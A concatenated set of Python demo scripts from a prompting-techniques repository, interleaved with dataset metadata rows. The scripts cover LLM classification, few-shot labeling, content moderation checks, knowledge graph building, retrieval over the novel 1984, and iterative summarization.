from tqdm import asyncio as tqdm_asyncio
from prompting_techniques import AsyncTyper, execute, format_prompt
np.random.seed(1)
client = openai.AsyncOpenAI()
func = wrap_chatcompletion(client.chat.completions.create)
app = AsyncTyper()
## Pre process dataset
## https://scikit-learn.org/stable/datasets/real_world.html#newsgroups-dataset
percent_of_data = 0.005
newsgroups = fetch_20newsgroups(
subset="all", data_home="./data", remove=("headers", "footers", "quotes")
)
newsgroups_target_names = [newsgroups.target_names[i] for i in newsgroups.target] # type: ignore
percent_of_data = 0.1
num_targets = 5
target_names_small = np.random.choice(newsgroups.target_names, num_targets, replace=False) # type: ignore
df = pd.DataFrame({"text": newsgroups.data, "target": newsgroups_target_names}) # type: ignore
df["text_short"] = df["text"].apply(lambda x: x[:5000])
test_df = df[df["target"].isin(target_names_small)].sample(frac=percent_of_data, random_state=1)
NewsTopic = enum.Enum("NewsTopic", [(t, t) for t in target_names_small])
class InferedNewsTopic(BaseModel):
topic: "NewsTopic" if TYPE_CHECKING else NewsTopic # type: ignore
semaphore = asyncio.Semaphore(128)
@retry(wait=wait_random_exponential(multiplier=1, max=3))
async def classify_article(article: str) -> InferedNewsTopic:
async with semaphore:
result: Optional[InferedNewsTopic] = None
for attempt in range(3):
try:
result = await asyncio.wait_for(
func(
messages=[
{
"role": "user",
"content": format_prompt(
f"""
You are an AI data labeler. You have one goal: to classify a given news article into one of the following topics: {', '.join(target_names_small)}.
The topics are abbreviated. Remember to think how the full article relates to the topic.
Think deeply and step by step about which topic this article belongs to. Check your work carefully.
Here is the article:
{article}
The topic of this article is one of the following "{', '.join(target_names_small)}". What is the topic of this article? Please output just the topic and nothing else.
"""
),
},
],
model="gpt-3.5-turbo-0613",
response_model=InferedNewsTopic,
temperature=0.1,
seed=256,
),
timeout=1,
)
break
except asyncio.TimeoutError:
continue
if result is None:
raise RuntimeError("Failed to classify article after 3 attempts")
return InferedNewsTopic.model_validate(result)
@app.command()
async def map_example():
"""Run an example support request label task."""
typer.echo("Running map' based classification example on newsgroups dataset.")
typer.echo("\n")
typer.echo("Dataset stats:")
typer.echo(f" - Number of articles: {len(test_df)}")
typer.echo(f" - Topics: {', '.join(target_names_small)}")
typer.echo("\n")
coros = [classify_article(article) for article in test_df["text_short"].tolist()]
tasks = [asyncio.create_task(coro) for coro in coros]
results = list(await execute(tasks, desc="Classifying articles"))
test_df["inferred_target"] = list(map(lambda i: i.topic.value, results))
typer.echo("\n\n\n")
num_correct = (test_df["target"] == test_df["inferred_target"]).sum()
typer.echo(f"Number correct: {num_correct}")
typer.echo(f"Number incorrect: {len(test_df) - num_correct}")
accuracy = (test_df["target"] == test_df["inferred_target"]).mean()
typer.echo(f"Accuracy: {accuracy}")
precision = precision_score(test_df["target"], test_df["inferred_target"], average="macro")
typer.echo(f"Precision: {precision}")
recall = recall_score(test_df["target"], test_df["inferred_target"], average="macro")
typer.echo(f"Recall: {recall}")
typer.echo("\n\n")
typer.echo("Confusion matrix:")
cm = confusion_matrix(test_df["target"], test_df["inferred_target"])
labels = sorted(list(set(test_df["target"]) | set(test_df["inferred_target"])))
typer.echo(pd.DataFrame(cm, index=labels, columns=labels).to_markdown())
if __name__ == "__main__":
app()
| [
", "
] |
2024-01-10 | cmrfrd/PromptingTechniques | prompting_techniques~7_knowledge_base_generation.py | import math
from itertools import islice
from typing import AsyncIterable, Optional
import networkx as nx
import nltk
import numpy as np
import openai
import pandas as pd
import tqdm
import typer
from asyncstdlib import map as amap
from asyncstdlib.functools import reduce as areduce
from graphviz import Digraph
from instructor.patch import wrap_chatcompletion
from pydantic import BaseModel, Field
from tenacity import retry, wait_random_exponential
from prompting_techniques import AsyncTyper, async_disk_cache, format_prompt
np.random.seed(1)
nltk.download("punkt")
client = openai.AsyncOpenAI()
func = wrap_chatcompletion(client.chat.completions.create)
app = AsyncTyper()
sent_detector = nltk.data.load("tokenizers/punkt/english.pickle")
ARTICLE = """
Little Red Riding Hood
Story by Leanne Guenther
Once upon a time, there was a little girl who lived in a village near the forest. Whenever she went out, the little girl wore a red riding cloak, so everyone in the village called her Little Red Riding Hood.
One morning, Little Red Riding Hood asked her mother if she could go to visit her grandmother as it had been awhile since they'd seen each other.
"That's a good idea," her mother said. So they packed a nice basket for Little Red Riding Hood to take to her grandmother.
When the basket was ready, the little girl put on her red cloak and kissed her mother goodbye.
"Remember, go straight to Grandma's house," her mother cautioned. "Don't dawdle along the way and please don't talk to strangers! The woods are dangerous."
"Don't worry, mommy," said Little Red Riding Hood, "I'll be careful."
But when Little Red Riding Hood noticed some lovely flowers in the woods, she forgot her promise to her mother. She picked a few, watched the butterflies flit about for awhile, listened to the frogs croaking and then picked a few more.
Little Red Riding Hood was enjoying the warm summer day so much, that she didn't notice a dark shadow approaching out of the forest behind her...
Suddenly, the wolf appeared beside her.
"What are you doing out here, little girl?" the wolf asked in a voice as friendly as he could muster.
"I'm on my way to see my Grandma who lives through the forest, near the brook," Little Red Riding Hood replied.
Then she realized how late she was and quickly excused herself, rushing down the path to her Grandma's house.
The wolf, in the meantime, took a shortcut...
The wolf, a little out of breath from running, arrived at Grandma's and knocked lightly at the door.
"Oh thank goodness dear! Come in, come in! I was worried sick that something had happened to you in the forest," said Grandma thinking that the knock was her granddaughter.
The wolf let himself in. Poor Granny did not have time to say another word, before the wolf gobbled her up!
The wolf let out a satisfied burp, and then poked through Granny's wardrobe to find a nightgown that he liked. He added a frilly sleeping cap, and for good measure, dabbed some of Granny's perfume behind his pointy ears.
A few minutes later, Red Riding Hood knocked on the door. The wolf jumped into bed and pulled the covers over his nose. "Who is it?" he called in a cackly voice.
"It's me, Little Red Riding Hood."
"Oh how lovely! Do come in, my dear," croaked the wolf.
When Little Red Riding Hood entered the little cottage, she could scarcely recognize her Grandmother.
"Grandmother! Your voice sounds so odd. Is something the matter?" she asked.
"Oh, I just have touch of a cold," squeaked the wolf adding a cough at the end to prove the point.
"But Grandmother! What big ears you have," said Little Red Riding Hood as she edged closer to the bed.
"The better to hear you with, my dear," replied the wolf.
"But Grandmother! What big eyes you have," said Little Red Riding Hood.
"The better to see you with, my dear," replied the wolf.
"But Grandmother! What big teeth you have," said Little Red Riding Hood her voice quivering slightly.
"The better to eat you with, my dear," roared the wolf and he leapt out of the bed and began to chase the little girl.
Almost too late, Little Red Riding Hood realized that the person in the bed was not her Grandmother, but a hungry wolf.
She ran across the room and through the door, shouting, "Help! Wolf!" as loudly as she could.
A woodsman who was chopping logs nearby heard her cry and ran towards the cottage as fast as he could.
He grabbed the wolf and made him spit out the poor Grandmother who was a bit frazzled by the whole experience, but still in one piece."Oh Grandma, I was so scared!" sobbed Little Red Riding Hood, "I'll never speak to strangers or dawdle in the forest again."
"There, there, child. You've learned an important lesson. Thank goodness you shouted loud enough for this kind woodsman to hear you!"
The woodsman knocked out the wolf and carried him deep into the forest where he wouldn't bother people any longer.
Little Red Riding Hood and her Grandmother had a nice lunch and a long chat.
"""
class Node(BaseModel):
id: int
label: str
color: str
def __hash__(self) -> int:
return hash((id, self.label))
class Edge(BaseModel):
source: int
target: int
label: str
color: str = "black"
def __hash__(self) -> int:
return hash((self.source, self.target, self.label))
class KnowledgeGraph(BaseModel):
nodes: Optional[list[Node]] = Field(..., default_factory=list)
edges: Optional[list[Edge]] = Field(..., default_factory=list)
def update(self, other: "KnowledgeGraph") -> "KnowledgeGraph":
"""Updates the current graph with the other graph, deduplicating nodes and edges."""
nodes = self.nodes if self.nodes is not None else []
edges = self.edges if self.edges is not None else []
other_nodes = other.nodes if other.nodes is not None else []
other_edges = other.edges if other.edges is not None else []
return KnowledgeGraph(
nodes=list(set(nodes + other_nodes)),
edges=list(set(edges + other_edges)),
)
def draw(self, prefix: Optional[str] = None):
dot = Digraph(comment="Knowledge Graph")
nodes = self.nodes if self.nodes is not None else []
edges = self.edges if self.edges is not None else []
# Add nodes
for node in nodes:
dot.node(str(node.id), node.label, color=node.color)
# Add edges
for i, edge in enumerate(edges):
dot.edge(str(edge.source), str(edge.target), label=f"{i} {edge.label}", color=edge.color)
dot.render(filename=f"./data/{prefix}", format="png", view=False)
@async_disk_cache(filename="./data/cache.db")
@retry(wait=wait_random_exponential(multiplier=1, max=3))
async def update_kb_graph(graph: KnowledgeGraph, text: str) -> KnowledgeGraph:
result: KnowledgeGraph = await func(
messages=[
{
"role": "system",
"content": format_prompt(
"""
You are an iterative knowledge graph builder.
You are given the current state of the graph, and you must append the nodes and edges
to it Do not procide any duplcates and try to reuse nodes as much as possible.
- Ensure that the only nodes are characters of the story
- Ensure that edges are significant interactions between characters
- Do not repeat nodes or edges of characters or interactions that have already been added
- Ignore everything else
"""
),
},
{
"role": "user",
"content": f"""Extract any new nodes and edges from the following:
{text}""",
},
{
"role": "user",
"content": f"""Here is the current state of the graph:
{graph.model_dump_json(indent=2)}""",
},
],
model="gpt-4",
response_model=KnowledgeGraph,
temperature=0,
seed=256,
)
kb = KnowledgeGraph.model_validate(graph.update(result))
kb.draw("knowledge_graph")
return kb
async def sliding_window(iterable: list[str], window_size: int, stride: int) -> AsyncIterable[list[str]]:
"""Generate a sliding window of specified size over the iterable."""
total_iterations = math.ceil((len(iterable) - window_size) / stride) + 1
with tqdm.tqdm(desc="Sliding Window", total=total_iterations) as progress:
for i in range(0, len(iterable)-window_size+1, stride):
yield iterable[i:i+window_size]
progress.update(1)
@app.command()
async def kb_generation():
typer.echo("Running reduce based summary on news article.")
typer.echo("\n")
window_size = 5
stride = 4
sentences: list[str] = sent_detector.tokenize(ARTICLE) # type: ignore
async def join_sentences(sentences: list[str]) -> str: return " ".join(sentences)
kb = await areduce(update_kb_graph, amap(join_sentences, sliding_window(sentences, window_size, stride)), initial=KnowledgeGraph()) # type: ignore
kb.draw("knowledge_graph") # type: ignore
if __name__ == "__main__":
app()
| [
"Extract any new nodes and edges from the following:\n\n PLACEHOLDER",
"\n You are an iterative knowledge graph builder.\n You are given the current state of the graph, and you must append the nodes and edges \n to it Do not procide any duplcates and try to reuse nodes as much as possible. \n \n - Ensure that the only nodes are characters of the story\n - Ensure that edges are significant interactions between characters\n - Do not repeat nodes or edges of characters or interactions that have already been added\n - Ignore everything else\n "
] |
2024-01-10 | cmrfrd/PromptingTechniques | prompting_techniques~2_few_shot.py | import openai
import typer
from prompting_techniques import AsyncTyper, format_prompt
client = openai.AsyncOpenAI()
app = AsyncTyper()
@app.command()
async def job_description_labeler():
"""From a given job description, label it with the appropriate job title."""
text: str = str(typer.prompt("Enter a job description", type=str))
assert len(text) > 0, "Please provide some text."
response = await client.chat.completions.create(
messages=[
{
"role": "system",
"content": format_prompt(f"""
You are an AI job classification bot. You have one goal: to label job descriptions with the appropriate job title / role.
Here are some examples of job descriptions and their corresponding job titles:
Description: you will advise clients on the adoption and implementation of renewable energy solutions. Your responsibilities include conducting feasibility studies, providing cost-benefit analyses, and staying up-to-date with the latest in sustainable technology.
Job: Renewable Energy Consultant
Description: will lead efforts to connect the organization with the local community. This role involves planning and executing community events, managing social media outreach, and building relationships with community leaders to promote the organization's mission and values
Job: Community Outreach Coordinator
Description: will oversee the development and management of urban farming projects. This role involves collaborating with community groups, managing sustainable agricultural practices, and promoting local food production in urban settings
Job: Urban Agriculture Director
Description: you will organize and manage commercial space travel experiences for clients. This includes coordinating with aerospace companies, ensuring compliance with safety regulations, and providing clients with a once-in-a-lifetime journey into space.
Job: Space Tourism Manager
Here is a new job description, please label it with the appropriate job title, just output the title nothing else:
Description: {text}
""")
}
],
max_tokens=64,
temperature=0.9,
model="gpt-4",
stream=True,
)
typer.echo("Job: ", nl=False)
async for message in response:
assert len(message.choices) > 0, "No text was provided."
typer.echo(message.choices[0].delta.content, nl=False)
if __name__ == "__main__":
app() | [
"\n You are an AI job classification bot. You have one goal: to label job descriptions with the appropriate job title / role.\n \n Here are some examples of job descriptions and their corresponding job titles:\n\n Description: you will advise clients on the adoption and implementation of renewable energy solutions. Your responsibilities include conducting feasibility studies, providing cost-benefit analyses, and staying up-to-date with the latest in sustainable technology.\n Job: Renewable Energy Consultant\n \n Description: will lead efforts to connect the organization with the local community. This role involves planning and executing community events, managing social media outreach, and building relationships with community leaders to promote the organization's mission and values\n Job: Community Outreach Coordinator\n \n Description: will oversee the development and management of urban farming projects. This role involves collaborating with community groups, managing sustainable agricultural practices, and promoting local food production in urban settings\n Job: Urban Agriculture Director\n \n Description: you will organize and manage commercial space travel experiences for clients. This includes coordinating with aerospace companies, ensuring compliance with safety regulations, and providing clients with a once-in-a-lifetime journey into space.\n Job: Space Tourism Manager\n \n Here is a new job description, please label it with the appropriate job title, just output the title nothing else:\n \n Description: PLACEHOLDER\n "
] |
2024-01-10 | cmrfrd/PromptingTechniques | prompting_techniques~4_multiple_choice.py | import enum
import openai
import typer
from instructor.patch import wrap_chatcompletion
from pydantic import BaseModel
from prompting_techniques import AsyncTyper, format_prompt
client = openai.AsyncOpenAI()
app = AsyncTyper()
class SupportRequestLabel(str, enum.Enum):
"""The types of support requests."""
hardware = "hardware"
software = "software"
network = "network"
security = "security"
access = "access"
training = "training"
other = "other"
class SupportRequestLabels(BaseModel):
labels: list[SupportRequestLabel]
async def get_support_request_labels(text: str) -> SupportRequestLabels:
func = wrap_chatcompletion(client.chat.completions.create)
result: SupportRequestLabels = await func(
messages=[
{
"role": "user",
"content": format_prompt(f"""
You are an AI support request labeler. You have one goal: to classify a given support request into one or more labels.
Classify the following support request: {text}
"""),
},
],
model="gpt-4",
response_model=SupportRequestLabels,
temperature=0,
seed=256,
)
return SupportRequestLabels.model_validate(result)
@app.command()
async def label():
"""From a given message of text, classify it into one or more support request labels."""
text: str = str(typer.prompt("Enter a support request", type=str))
assert len(text) > 0, "Please provide some text."
typer.echo("Labels:")
labels = await get_support_request_labels(text)
for label in labels.labels:
typer.echo(f" - {label.value}")
@app.command()
async def example():
"""Run an example support request label task."""
text = "Help me, I think something is broken! I can't access my email."
assert len(text) > 0, "Please provide some text."
typer.echo(f"Support Request: {text}")
typer.echo("Labels:")
labels = await get_support_request_labels(text)
for label in labels.labels:
typer.echo(f" - {label.value}")
if __name__ == "__main__":
app() | [
"\n You are an AI support request labeler. You have one goal: to classify a given support request into one or more labels.\n \n Classify the following support request: Help me, I think something is broken! I can't access my email.\n "
] |
2024-01-10 | cmrfrd/PromptingTechniques | prompting_techniques~3_multistep.py | import asyncio
import openai
import tiktoken
import typer
from prompting_techniques import AsyncTyper, format_prompt
client = openai.AsyncOpenAI()
app = AsyncTyper()
BOOL_STR = ["true", "false"]
BOOL_LOGIT_BIAS = dict(
(str(tiktoken.encoding_for_model("gpt-4").encode(t)[0]), int(100)) for t in BOOL_STR
)
async def bool_prompt(prompt: str) -> bool:
"""Prompt a boolean question."""
response = await client.chat.completions.create(
messages=[
{
"role": "system",
"content": prompt,
}
],
max_tokens=1,
temperature=0,
seed=256,
model="gpt-4",
logit_bias=BOOL_LOGIT_BIAS
)
content = response.choices[0].message.content
assert any(content == t for t in BOOL_STR), "No boolean value was outputed."
match content:
case "true":
return True
case "false":
return False
raise ValueError("No boolean value was outputed.")
async def has_profanity(text: str) -> bool:
"""Determine if a given text has profanity."""
return await bool_prompt(
format_prompt(f"""
You are an AI profanity filter. You have one goal: to determine if a given text has profanity. This includes profanity in any language, curse words, and slurs.
Here is the input text: {text}
Is there profanity in the text? Please output either "true" or "false" and nothing else.
""")
)
async def has_sensitive_topic(text: str) -> bool:
"""Determine if a given text has a sensative topic."""
return await bool_prompt(
format_prompt(f"""
You are an AI sensative topic filter. You have one goal: to determine if a given text has a sensative topic. This includes politics, religion, and other topics that may be considered offensive.
Here is the input text: {text}
Is there a sensative topic in the text? Please output either "true" or "false" and nothing else.
""")
)
async def has_spam(text: str) -> bool:
"""Determine if a given text is spam."""
return await bool_prompt(
format_prompt(f"""
You are an AI spam filter. You have one goal: to determine if a given text is spam. This includes advertisements, links, crypto scama, and other unwanted content.
Here is the input text: {text}
Is there spam in the text? Please output either "true" or "false" and nothing else.
""")
)
async def has_sensitive_data(text: str) -> bool:
"""Determine if a given text has sensative data."""
return await bool_prompt(
format_prompt(f"""
You are an AI sensative data filter. You have one goal: to determine if a given text has sensative data. This includes credit card numbers, social security numbers, phone numbers, and other personal information.
Here is the input text: {text}
Is there sensative data in the text? Please output either "true" or "false" and nothing else.
""")
)
@app.command()
async def content_moderation():
"""From a given message of text, determine if it is safe for work."""
text: str = str(typer.prompt("Content moderation filter. Enter a chat message", type=str))
assert len(text) > 0, "Please provide some text."
typer.echo("Content moderation results:")
check_mapping = {
has_profanity: "Profanity detected.",
has_sensitive_topic: "Sensitive topic detected.",
has_spam: "Spam detected.",
has_sensitive_data: "Sensitive data detected.",
}
results = await asyncio.gather(*(check(text) for check in check_mapping))
# Print all the checks that were triggered
for check, result in zip(check_mapping, results):
if result:
typer.echo(check_mapping[check])
if not any(results):
typer.echo("No issues detected.")
if __name__ == "__main__":
app() | [] |
2024-01-10 | cmrfrd/PromptingTechniques | prompting_techniques~8_rag.py | import asyncio
import json
import math
import os
from itertools import islice
from typing import AsyncIterable, Iterable, Optional
import networkx as nx
import nltk
import numpy as np
import numpy.typing as npt
import openai
import pandas as pd
import tqdm
import typer
from asyncstdlib import map as amap
from asyncstdlib.functools import reduce as areduce
from graphviz import Digraph
from instructor.patch import wrap_chatcompletion
from pydantic import BaseModel, Field
from tenacity import retry, wait_random_exponential
from prompting_techniques import AsyncTyper, async_disk_cache, execute, format_prompt
np.random.seed(1)
nltk.download("punkt")
client = openai.AsyncOpenAI()
app = AsyncTyper()
sent_detector = nltk.data.load("tokenizers/punkt/english.pickle")
book_1984 = open("./data/1984.txt", "r").read()
semaphore = asyncio.Semaphore(128)
class VectorDatabase(BaseModel):
text: list[str]
embeddings: npt.NDArray[np.float32]
class Config:
arbitrary_types_allowed = True
def save_to_file(self, filename: str):
# Convert NumPy array to a list for JSON serialization
data = {"text": self.text, "embeddings": self.embeddings.tolist()}
with open(filename, "w") as file:
json.dump(data, file)
@classmethod
def load_from_file(cls, filename: str):
with open(filename, "r") as file:
data = json.load(file)
# Convert list back to NumPy array
data["embeddings"] = np.array(data["embeddings"], dtype=np.float32)
return cls(**data)
async def add_text(self, text: str) -> None:
async with semaphore:
embeddings_response = await client.embeddings.create(
model="text-embedding-ada-002",
input=text,
)
embedding: npt.NDArray[np.float32] = np.expand_dims(
np.array(embeddings_response.data[0].embedding), axis=0
)
self.text.append(text)
self.embeddings = np.concatenate([self.embeddings, embedding], axis=0)
async def top_k(self, query: str, k: int = 10) -> list[str]:
query_embedding_response = await client.embeddings.create(
model="text-embedding-ada-002",
input=query,
)
query_embedding: npt.NDArray[np.float32] = np.array(
query_embedding_response.data[0].embedding
)
# cosine similarity, get top k
similarity: npt.NDArray[np.float32] = np.dot(query_embedding, self.embeddings.T) / (
np.linalg.norm(query_embedding) * np.linalg.norm(self.embeddings, axis=1)
)
sorted_similarity_indices: npt.NDArray[np.int64] = np.argsort(similarity)[::-1]
top_k: list[str] = [self.text[i] for i in sorted_similarity_indices[:k]]
return top_k
@retry(wait=wait_random_exponential(multiplier=1, max=3))
async def get_ask_1984_response(vecdb: VectorDatabase, question: str) -> AsyncIterable[str | None]:
related_passages = "\n".join(await vecdb.top_k(question, k=5))
result = await client.chat.completions.create(
messages=[
{
"role": "system",
"content": format_prompt(
"""
You are an AI question answer bot built with the knowledge and lessons from the famous book 1984 by George Orwell. \
You have one goal: to answer questions and give advice about the book 1984. \
Guideless:
- You should answer the question directly and not provide any other information.
- You should not provide any information that is not directly related to the question.
- Keep your answers short and to the point.
"""
),
},
{
"role": "system",
"content": format_prompt(
f"""
Here are some direct excerpts from the book 1984 related to the users question:
{related_passages}
"""
),
},
{
"role": "user",
"content": f"""Here is the users question:
{question}
""",
},
],
model="gpt-4",
temperature=0,
seed=256,
max_tokens=128,
stream=True,
)
async for message in result:
assert len(message.choices) > 0, "No choices were provided."
content = message.choices[0].delta.content
yield content
def sliding_window(iterable: list[str], window_size: int, stride: int) -> Iterable[list[str]]:
"""Generate a sliding window of specified size over the iterable."""
total_iterations = math.ceil((len(iterable) - window_size) / stride) + 1
with tqdm.tqdm(desc="Sliding Window", total=total_iterations) as progress:
for i in range(0, len(iterable) - window_size + 1, stride):
yield iterable[i : i + window_size]
progress.update(1)
async def read_or_create_vecdb() -> VectorDatabase:
## CHeck if vecdb exists
vecdb_filename = "./data/vecdb.json"
if os.path.exists(vecdb_filename):
vecdb = VectorDatabase.load_from_file(vecdb_filename)
else:
vecdb = VectorDatabase(text=[], embeddings=np.empty((0, 1536), dtype=np.float32))
window_size = 16
stride = 8
sentences: list[str] = sent_detector.tokenize(book_1984) # type: ignore
def join_sentences(sentences: list[str]) -> str:
return " ".join(sentences)
chunks = [i for i in map(join_sentences, sliding_window(sentences, window_size, stride))]
await execute([vecdb.add_text(chunk) for chunk in chunks], desc="Adding to vecdb")
vecdb.save_to_file(vecdb_filename)
return vecdb
@app.command()
async def ask_1984():
vecdb = await read_or_create_vecdb()
text: str = str(typer.prompt("What question / advice do you want to ask about the book 1984?", type=str))
assert len(text) > 0, "Please provide some text."
typer.echo("\n")
async for token in get_ask_1984_response(vecdb, text):
typer.echo(token, nl=False)
@app.command()
async def vec_lookup(n: int = 3):
vecdb = await read_or_create_vecdb()
text: str = str(typer.prompt(f"Query top {n} results from the vecdb", type=str))
assert len(text) > 0, "Please provide some text."
typer.echo("\n")
for passage in await vecdb.top_k(text, k=n):
typer.echo(passage)
typer.echo("\n")
if __name__ == "__main__":
app()
| [
"\n Here are some direct excerpts from the book 1984 related to the users question:\n \n PLACEHOLDER\n ",
"Here is the users question:\n \n PLACEHOLDER\n ",
"\n You are an AI question answer bot built with the knowledge and lessons from the famous book 1984 by George Orwell. You have one goal: to answer questions and give advice about the book 1984. \n Guideless:\n - You should answer the question directly and not provide any other information.\n - You should not provide any information that is not directly related to the question.\n - Keep your answers short and to the point.\n "
] |
2024-01-10 | cmrfrd/PromptingTechniques | prompting_techniques~1_zero_shot.py | import openai
import typer
from prompting_techniques import AsyncTyper, format_prompt
client = openai.AsyncOpenAI()
app = AsyncTyper()
@app.command()
async def cowboy_translator():
"""Translate text into cowboy speak."""
text: str = str(typer.prompt("What do you want to translate?", type=str))
assert len(text) > 0, "Please provide some text to translate."
response = await client.chat.completions.create(
messages=[
{
"role": "system",
"content": format_prompt(f"""
You are a friendly AI cowboy. You have one goal: to translate text into cowboy speak.
Here is the input text: {text}
What is the cowboy translation? Please output just the translation and nothing else.
""")
}
],
max_tokens=64,
temperature=0.9,
model="gpt-4",
stream=True,
)
typer.echo("Translation: ", nl=False)
async for message in response:
assert len(message.choices) > 0, "No translation was provided."
typer.echo(message.choices[0].delta.content, nl=False)
if __name__ == "__main__":
app() | [
"\n You are a friendly AI cowboy. You have one goal: to translate text into cowboy speak.\n \n Here is the input text: PLACEHOLDER\n \n What is the cowboy translation? Please output just the translation and nothing else.\n "
] |
2024-01-10 | cmrfrd/PromptingTechniques | prompting_techniques~6_higher_order_functions_reduce.py | import asyncio
from itertools import islice
from typing import AsyncIterable, Generator, Iterable
import nltk.data
import numpy as np
import openai
import pandas as pd
import tqdm
import typer
from asyncstdlib import map as amap
from asyncstdlib.functools import reduce as areduce
from tenacity import retry, wait_random_exponential
from prompting_techniques import AsyncTyper, async_disk_cache, execute, format_prompt
np.random.seed(1)
nltk.download('punkt')
client = openai.AsyncOpenAI()
app = AsyncTyper()
sent_detector = nltk.data.load('tokenizers/punkt/english.pickle')
ARTICLE = """
OpenAI's board of directors' abruptly firing CEO Sam Altman then bringing him back days later did not come out of nowhere.
In fact, the boardroom drama represented the boiling over of tensions that have long simmered under the surface of the company.
Following days of upheaval, Altman is again leading the company and a newly-formed board of directors is charting the path ahead, but the chaos at OpenAI can be traced back to the unusual way the company was structured.
OpenAI was founded in 2015 by Altman, Elon Musk and others as a non-profit research lab. It was almost like an anti-Big Tech company; it would prioritize principles over profit. It wanted to, as OpenAI put it back then, develop AI tools that would "benefit humanity as a whole, unconstrained by a need to generate financial return."
With his sudden return to OpenAI, Sam Altman becomes the latest 'boomerang CEO'
BUSINESS
With his sudden return to OpenAI, Sam Altman becomes the latest 'boomerang CEO'
But in 2018, two things happened: First, Musk quit the board of OpenAI after he said he invested $50 million, cutting the then-unknown company off from more of the entrepreneur's crucial financial backing.
And secondly, OpenAI's leaders grew increasingly aware that developing and maintaining advanced artificial intelligence models required an immense amount of computing power, which was incredibly expensive.
Balancing ideals with the need for funding
A year after Musk left, OpenAI created a for-profit arm. Technically, it is what's known as a "capped profit" entity, which means investors' possible profits are capped at a certain amount. Any remaining money is re-invested in the company.
Yet the nonprofit's board and mission still governed the company, creating two competing tribes within OpenAI: adherents to the serve-humanity-and-not-shareholders credo and those who subscribed to the more traditional Silicon Valley modus operandi of using investor money to release consumer products into the world as rapidly as possible in hopes of cornering a market and becoming an industry pacesetter.
Altman, a 38-year-old techno-optimist who previously led the prestigious startup accelerator Y Combinator, tried to thread the needle between the two approaches. He struck something of a middle ground by unveiling new OpenAI tools gradually, first to smaller groups, then larger ones, to fine-tune and refine the tools before making them public.
ChatGPT's success attracts Big Tech money
When OpenAI kicked off a seismic shift in the tech industry with its launch of ChatGPT last year, the company's most prominent investor, Microsoft, greatly increased its financial stake. It upped its commitment to OpenAI to the tune of $13 billion.
Microsoft became the financial engine that powered OpenAI, but the nonprofit's board of directors still called all the shots. Despite Microsoft's sizable investment, it did not have a seat on OpenAI's board.
All of this set the stage for Altman's sudden ouster from the company earlier this month.
The board itself has still not explained why it fired Altman — beyond saying, in vague terms, that it believed Altman had not been "consistently candid in his communications with the board." And the company's structure gives the board that right: it has complete, unchecked power to remove the CEO whenever it sees fit.
Sources close to the discussions say before Altman's termination, he had been at odds with members of the board over the hasty commercialization of OpenAI products. Board members worried whether Altman was considering the risks of AI products seriously enough, or just trying to maintain the company's dominant position in the crowded and competitive world of generative AI development.
The dangers of powerful AI range from supercharging the spread of disinformation, massive job loss and human impersonation exploited by bad actors.
The question was, did Altman abandon OpenAI's founding principles to try to scale up the company and sign up customers as fast as possible? And, if so, did that make him unsuited to helm a nonprofit created to develop AI products "free from financial obligations"?
Whatever its reasoning, there was nothing Microsoft, or any company executive, could do when the board moved to jettison Altman. The dramatic gesture, and then reversal, illustrated the tension at the heart of OpenAI's structure.
An anonymous letter written by former OpenAI employees during the Altman drama called on the board to examine whether Altman was putting commercial products and fundraising goals before the nonprofit's founding mission.
"We implore you, the Board of Directors, to remain steadfast in your commitment to OpenAI's original mission and not succumb to the pressures of profit-driven interests," the letter states. "The future of artificial intelligence and the well-being of humanity depend on your unwavering commitment to ethical leadership and transparency."
An uneasy resolution
OpenAI's board at first refused to entertain the possibility of Altman returning, but then something happened they could not ignore: 702 out of OpenAI's 770 employees committed to leaving the company unless Altman was restored. The employees also asked that a new board be assembled. It was, and Altman was restored as CEO not long after.
Just one former board member sits on the new, temporary board: Adam D'Angelo, the CEO of the question-and-answer site Quora. He had voted for Altman's ouster.
Others, who are familiar to Silicon Valley boards, have taken seats alongside him. They include Bret Taylor, a longtime Silicon Valley executive and former chairman of the board of Twitter, and former Treasury Secretary Larry Summers.
As it stands, OpenAI's charter says it is committed to the development of artificial general intelligence, also known as AGI, or a type of AI superintelligence that can outperform humans, that will not "harm humanity or unduly concentrate power."
But success in Silicon Valley almost always requires massive scale and the concentration of power — something that allowed OpenAI's biggest funder, Microsoft, to become one of the most valuable companies in the world. It is hard to imagine Microsoft would invest $13 billion into a company believing it would not one day have an unmovable foothold in the sector.
Under the board's current mission, developing AI systems should be undertaken with the main goal of benefiting all of humanity, with no regard to ever turning a profit for outside investors.
Yet the for-profit entity of OpenAI will continue to recruit moneyed enthusiasts who want in on the AI goldrush. The two sides are at cross purposes, with no clear way to co-exist.
The new board is expected to grow and include a representative from Microsoft. Among the board's tasks: taking a hard look at OpenAI's structure. Does the hybrid model create too much friction? Or is there a way to forge ahead with a middle-of-the-road approach?
"""
async def sliding_window(iterable: list[str], size: int) -> AsyncIterable[list[str]]:
"""Generate a sliding window of specified size over the iterable."""
iterators = [list(islice(iterable, i, None)) for i in range(size)]
## progress
with tqdm.tqdm(desc="Sliding Window", total=len(iterable)) as progress:
for item in zip(*iterators):
yield item
progress.update(1)
@async_disk_cache(filename="./data/cache.db")
@retry(wait=wait_random_exponential(multiplier=1, max=3))
async def condense(summary: str, new_information: str) -> str:
"""Condense a summary with new information."""
response = await client.chat.completions.create(
messages=[
{
"role": "system",
"content": format_prompt(
f"""
You are an AI summarizer. You have one goal: to condense a summary of a news article with new information from the article.
Guidelines
- Make every word count: Rewrite the previous summary to improve flow and make space for additional entities
- Ensure key details are not lost: The new summary should contain all the entities from the previous summary
- Never drop entities from the previous summary. If space cannot be made, add fewer new entities.
- The new summary should be highly dense and concise yet self-contained, eg., easily understood without the Article.
- Make space with fusion, compression, and removal of uninformative phrases like "the article discusses"
- Missing entities can appear anywhere in the new summary
- Keep the summary at a maximum of 4-5 sentences long
An Entity is a real-world object that's assigned a name - for example, a person, country a product or a book title.
"""
),
},
{
"role": "user",
"content": format_prompt(
f"""
Here is the previous summary along with the new information is provided below.
Here is the summary: {summary}
Here is the new information: {new_information}
Please output a new condensed summary and nothing else.
"""
),
}
],
max_tokens=30*6,
temperature=0.9,
seed=256,
model="gpt-3.5-turbo-0613",
)
assert len(response.choices) > 0, "No choices were returned."
content = response.choices[0].message.content
assert content is not None, "No text was provided."
return content
@app.command()
async def reduce_example():
typer.echo("Running reduce based summary on news article.")
typer.echo("\n")
window_size = 4
sentences: list[str] = sent_detector.tokenize(ARTICLE) # type: ignore
async def join_sentences(sentences: list[str]) -> str: return " ".join(sentences)
summary = await areduce(condense, amap(join_sentences, sliding_window(sentences, window_size)), initial="")
